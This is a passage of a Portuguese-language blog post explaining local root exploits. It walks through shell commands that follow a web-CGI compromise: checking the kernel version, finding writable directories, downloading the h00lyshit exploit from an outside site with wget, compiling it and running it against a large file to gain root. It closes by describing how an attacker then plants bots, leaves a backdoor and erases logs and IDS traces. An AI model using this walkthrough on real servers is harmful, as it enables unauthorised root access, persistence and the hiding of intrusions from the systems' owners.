seria usar um XPL(exploit local) se com um exploit você obteve
acesso a um “user” o segundo passo seria pegar o Root pelo menos
na cabeça do cracker…
Vamos pegar um exemplo:
1-usamos o exploit “Censtore. cgi exploit” para explorar um determinado server
http://www.milw0rm.com/exploits/1669
2-exploramos a falha num server vulnerável nos temos acesso a um “user” padrão exemplo
Código:
$ wellcome to debian
adminweb-$ uname -a <–analisando a versão do kernel
host.com.br bla bla 2.6.8 Linux kernel
adminweb-$ find / -perm -2 -ls <–comando para ver arquivos com permissão de escrita
/tmp/
/dev/bla bla ;………………..
adminweb-$ cd /tmp <– inves de procurar arquivos com permissões resolvi ir na pasta “/tmp” ou seja temporários
la temos permissão para usar executar arquivos dar wget depende muito do server em alguns tera que usar ftp ou curl…
3-Aqui a parte mais chata achar o XPL para versão do kernel bem como o kernel achado é antigo vamos usar o h00lyshit,a todo momento sai XPL para sistemas embora alguns sistemas demorem mais para sair como OpenBSD e NetBSD isso vai muito do Programador que faz XPLs geralmente eles fazem para os sistemas mais populares “Linux e freebsd” . Não é à toa que se você tem um servidor com linux você em que compilar o um novo kernel direto para ver as melhorias e arrumar as vulnerabilidades…
do sistema ,bem continuando..
Código:
- Código:
adminweb-$ wget http://www.arblan.com/localroot/h00lyshit.c <–baixar o xpl do site desejado
download bla bla
adminweb-$ gcc h00lyshit.c -o h00lyshit <– compilamos o exploit
bla bla make.. bla bal
/ .. // as/.d./ ././ bla bla
adminweb-$
4-terminado isso temos que executar o XPL , porém, o h00lyshit como muitos XPL precisão de um arquivo grande para bugar e causar um crash no kernel exemplo “./h00lyshit arquivo_grande_do_disco” feito isso se tudo dar certo teremos acesso ao root,mas vamos gerar um arquivo grande no sistema com o comando “dd if=/dev/urandom of=grande count=2M” vai demorar de 2 a 5minutos se o comando falhar tente dd “if=/dev/zero of=/tmp/grande count=102400 bs=1024″ feito isso vamos executar nosso XPL
- Código:
adminweb-$./h00lyshit grande
root-# whoami <– verificandose somos root
root
root-#
Pronto, funcionou o XPL estamos como root,um Cracker depois disso dar upload em seus Bots,deixa um OpenSSH ou um Backdoor e queima os Logs do sistema e possíveis ids(snort etc..)
Bem, acho que com este artigo vai ajudar muitos a entender como funciona XPLs.
Quer se sentir seguro? Use OpenBSD no seu servidor Piscar
0 comentários:
Postar um comentário